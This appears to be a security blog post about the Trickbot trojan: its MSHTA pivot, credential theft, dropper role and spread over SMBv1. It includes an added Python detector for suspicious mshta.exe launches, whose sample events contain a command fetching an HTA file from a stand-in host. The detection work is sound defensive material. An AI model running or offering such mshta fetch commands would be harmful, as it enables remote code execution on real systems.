Trickbot is a nasty little trojan to begin with, and many companies were caught out by it because few anti-malware solutions were actually looking for the MSHTA pivot it used. Far too many solutions still do not see that pivot and rely instead on detection signatures for the malware payload, which has pushed the malware's developers to work on further techniques for evading those signatures.
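A behaviour-based check for the MSHTA pivot described above, as an added example that is not from the original post: it flags mshta.exe launches by parent process and command line, the way a payload signature cannot. The event fields, the Office parent list and the sample records are constructed assumptions for illustration.

```python
import re
from dataclasses import dataclass

# Parents that should practically never spawn mshta.exe on a managed host (assumption).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_PROTOCOL = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)

@dataclass
class ProcessEvent:  # the fields a Sysmon event ID 1 record provides
    parent_image: str
    image: str
    command_line: str

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return why an mshta.exe launch looks like a pivot, or None if it does not."""
    if basename(event.image) != "mshta.exe":
        return None
    reasons = []
    if basename(event.parent_image) in OFFICE_PARENTS:
        reasons.append("office-parent")       # a document spawned the script host
    if REMOTE_URL.search(event.command_line):
        reasons.append("remote-url")          # HTA fetched from the network
    if SCRIPT_PROTOCOL.search(event.command_line):
        reasons.append("script-protocol")     # inline script, nothing on disk to scan
    return reasons or None

def find_mshta_pivots(events):
    return [(e, r) for e in events if (r := classify(e))]

# Constructed sample events; the hostname uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://update.example.invalid/doc.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r'mshta.exe "C:\Program Files\Vendor\help.hta"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
                 'mshta.exe "javascript:window.close()"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for event, reasons in find_mshta_pivots(SAMPLE_EVENTS):
        print(f"{basename(event.parent_image)} -> mshta.exe: {', '.join(reasons)}")
```

The locally installed help.hta launched from Explorer is deliberately left unflagged; a real deployment would tune the parent list and add file-reputation or signer checks to suit its own environment.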
One of Trickbot's primary functions is to steal credentials, which are then used to obtain further access or to exfiltrate data. It does this through a Man-in-the-Browser tactic (T1185). Because the malware also acts as a dropper, it can gather information through other methods as well. Researchers have observed Trickbot being used to deploy ransomware and the Emotet cryptominer (I have seen this one firsthand). Trickbot has multiple methods of maintaining persistence on a targeted device. It really is the Swiss Army knife of malware. According to CISA:
“TrickBot is capable of data exfiltration over a hardcoded C2 server, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (Exfiltration Over C2 Channel [T1041], Resource Hijacking [T1496], System Information Discovery).[2] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks.”
Trickbot has been known to spread over SMBv1 using captured credentials. This is not that much of a concern, as everyone has this disabled, right? It also relies on several pivots that should be disabled in most environments, and even in the consumer market. Reliance on malicious websites, documents and even SMBv1 are all things that should, at this stage, no longer be an option for attackers. Clearly there is a lot more work to be done in the security world while this type of malware continues to flourish and remain effective.